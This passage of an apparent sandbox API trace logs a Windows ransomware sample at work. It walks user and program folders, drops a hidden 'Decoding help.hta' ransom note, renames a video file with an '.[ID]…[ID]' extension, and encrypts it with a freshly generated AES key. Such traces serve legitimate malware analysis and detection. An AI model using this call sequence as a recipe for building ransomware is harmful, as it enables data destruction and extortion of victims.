Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*") returned 99 [0049.064] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\", lpString2="vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0049.064] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" [0049.064] GlobalMemoryStatus (in: lpBuffer=0x164dfd10 | out: lpBuffer=0x164dfd10) [0049.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93d0388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x358 [0049.071] CloseHandle (hObject=0x358) returned 1 [0049.071] FindNextFileW (in: hFindFile=0x671e70, lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0049.071] FindClose (in: hFindFile=0x671e70 | out: hFindFile=0x671e70) returned 1 Thread: id = 547 os_tid = 0xcd0 [0047.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*", lpFindFileData=0x165dfd30 | out: lpFindFileData=0x165dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671f70 [0047.499] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.499] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0x165dfd30 | out: lpFindFileData=0x165dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.499] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.499] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.499] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0x165dfd30 | out: lpFindFileData=0x165dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0047.499] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_amd64") returned -1 [0047.499] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_amd64") returned -1 [0047.499] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_amd64") returned 1 [0049.070] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*" [0049.070] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*") returned 99 [0049.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\", lpString2="vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0049.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" [0049.071] GlobalMemoryStatus (in: lpBuffer=0x165dfd10 | out: lpBuffer=0x165dfd10) [0049.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98426b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0049.078] CloseHandle (hObject=0x540) returned 1 [0049.078] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0x165dfd30 | out: lpFindFileData=0x165dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0049.078] FindClose (in: hFindFile=0x671f70 | out: hFindFile=0x671f70) returned 1 Thread: id = 548 os_tid = 0xcd4 [0047.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*", lpFindFileData=0x166dfd30 | out: lpFindFileData=0x166dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671eb0 [0047.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.500] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0x166dfd30 | out: lpFindFileData=0x166dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.500] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.500] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.500] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0x166dfd30 | out: lpFindFileData=0x166dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0047.500] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_x86") returned -1 [0047.500] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_x86") returned -1 [0047.500] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_x86") returned 1 [0049.077] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*" [0049.077] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*") returned 99 [0049.077] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\", lpString2="vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0049.077] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*" [0049.077] GlobalMemoryStatus (in: lpBuffer=0x166dfd10 | out: lpBuffer=0x166dfd10) [0049.077] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e05be8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2bc [0049.085] CloseHandle (hObject=0x2bc) returned 1 [0049.085] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0x166dfd30 | out: lpFindFileData=0x166dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0049.085] FindClose (in: hFindFile=0x671eb0 | out: hFindFile=0x671eb0) returned 1 Thread: id = 549 os_tid = 0xcd8 [0047.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*", lpFindFileData=0xee4fd30 | out: lpFindFileData=0xee4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ad3b650, ftCreationTime.dwHighDateTime=0x1d4cabd, ftLastAccessTime.dwLowDateTime=0x6cce9a70, ftLastAccessTime.dwHighDateTime=0x1d4ca0a, ftLastWriteTime.dwLowDateTime=0x6cce9a70, ftLastWriteTime.dwHighDateTime=0x1d4ca0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a30 [0047.805] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.805] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0xee4fd30 | out: lpFindFileData=0xee4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ad3b650, ftCreationTime.dwHighDateTime=0x1d4cabd, ftLastAccessTime.dwLowDateTime=0x6cce9a70, ftLastAccessTime.dwHighDateTime=0x1d4ca0a, ftLastWriteTime.dwLowDateTime=0x6cce9a70, ftLastWriteTime.dwHighDateTime=0x1d4ca0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.805] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.805] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.805] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0xee4fd30 | out: lpFindFileData=0xee4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9a1c4e0, ftCreationTime.dwHighDateTime=0x1d4c8cd, ftLastAccessTime.dwLowDateTime=0x618b7af0, ftLastAccessTime.dwHighDateTime=0x1d4d312, ftLastWriteTime.dwLowDateTime=0x618b7af0, ftLastWriteTime.dwHighDateTime=0x1d4d312, nFileSizeHigh=0x0, nFileSizeLow=0xad65, dwReserved0=0x0, dwReserved1=0x0, cFileName="7WJVpg9U-iOyHGjTm2 b.flv", cAlternateFileName="7WJVPG~1.FLV")) returned 1 [0049.174] lstrcpyW (in: lpString1=0x10d56b50, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*" [0049.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*") returned 58 [0049.174] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\Decoding help.hta" [0049.174] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5sddnuccnjg8e\\decoding help.hta")) returned 0xffffffff [0049.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5sddnuccnjg8e\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x628 [0051.673] WriteFile (in: hFile=0x628, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xee4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xee4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.698] CloseHandle (hObject=0x628) returned 1 [0053.676] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.422] lstrcmpiW (lpString1="Decoding help.hta", lpString2="7WJVpg9U-iOyHGjTm2 b.flv") returned 1 [0058.422] lstrlenW (lpString="7WJVpg9U-iOyHGjTm2 b.flv") returned 24 [0058.422] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*" [0058.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*") returned 58 [0058.422] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\", lpString2="7WJVpg9U-iOyHGjTm2 b.flv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv" [0058.422] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv" [0058.422] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv.[ID]g9uZrLhJaygpwRm1[ID]" [0058.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5sddnuccnjg8e\\7wjvpg9u-ioyhgjtm2 b.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5sddnuccnjg8e\\7wjvpg9u-ioyhgjtm2 b.flv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\7WJVpg9U-iOyHGjTm2 b.flv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5sddnuccnjg8e\\7wjvpg9u-ioyhgjtm2 b.flv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc14 [0058.423] CreateFileMappingA (hFile=0xc14, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc18 [0058.423] CryptAcquireContextA (in: phProv=0xee4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xee4fcec*=0x2aac6110) returned 1 [0060.214] CryptGenKey (in: hProv=0x2aac6110, Algid=0x6610, dwFlags=0x1, phKey=0xee4fce8 | out: phKey=0xee4fce8*=0x5fca720) returned 1 [0060.214] CryptExportKey (in: hKey=0x5fca720, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xee4fbe4, pdwDataLen=0xee4fce4 | out: pbData=0xee4fbe4*, pdwDataLen=0xee4fce4*=0x2c) returned 1 [0060.214] MapViewOfFile (hFileMappingObject=0xc18, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xad60) returned 0x4490000 [0064.287] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xee4fbe4*, pdwDataLen=0xee4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xee4fbe4*, pdwDataLen=0xee4fcf8*=0x100) returned 1 [0064.287] CryptEncrypt (in: hKey=0x5fca720, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4490000, pdwDataLen=0xee4fce4*=0xad60, dwBufLen=0xad60 | out: pbData=0x4490000*, pdwDataLen=0xee4fce4*=0xad60) returned 1 [0064.288] UnmapViewOfFile (lpBaseAddress=0x4490000) returned 1 [0064.290] CloseHandle (hObject=0xc18) returned 1 [0064.290] CryptDestroyKey (hKey=0x5fca720) returned 1 [0064.290] CryptReleaseContext (hProv=0x2aac6110, dwFlags=0x0) returned 1 [0064.290] SetFilePointerEx (in: hFile=0xc14, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.290] WriteFile (hFile=0xc14, lpBuffer=0xee4fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xee4fcf8, lpOverlapped=0x0) Thread: id = 550 os_tid = 0xcdc [0047.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*", lpFindFileData=0x124dfd30 | out: lpFindFileData=0x124dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x22ef26d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22ef26d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671f30 [0047.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.501] FindNextFileW (in: hFindFile=0x671f30, lpFindFileData=0x124dfd30 | out: lpFindFileData=0x124dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x22ef26d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22ef26d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.501] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.501] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.501] FindNextFileW (in: hFindFile=0x671f30, lpFindFileData=0x124dfd30 | out: lpFindFileData=0x124dfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x22ef26d0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x22ef26d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22ef26d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0049.082] lstrcpyW (in: lpString1=0x9862720, lpString2="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*" [0049.082] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*") returned 47 [0049.082] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\Decoding help.hta" [0049.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\Decoding help.hta" (normalized: "c:\\users\\all users\\sun\\java\\java update\\decoding help.hta")) returned 0x1 [0049.083] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0049.083] FindNextFileW (in: hFindFile=0x671f30, lpFindFileData=0x124dfd30 | out: lpFindFileData=0x124dfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x22f18830, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x677, dwReserved0=0x0, dwReserved1=0x0, cFileName="jaureglist.xml.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="JAUREG~1._ID")) returned 1 [0049.083] lstrcpyW (in: lpString1=0x9862720, lpString2="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*" [0049.083] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*") returned 47 [0049.083] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\Decoding help.hta" [0049.083] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\Decoding help.hta" (normalized: "c:\\users\\all users\\sun\\java\\java update\\decoding help.hta")) returned 0x1 [0049.083] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jaureglist.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0049.083] lstrlenW (lpString="jaureglist.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned 39 [0049.083] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0049.083] FindNextFileW (in: hFindFile=0x671f30, lpFindFileData=0x124dfd30 | out: lpFindFileData=0x124dfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x803771e0, 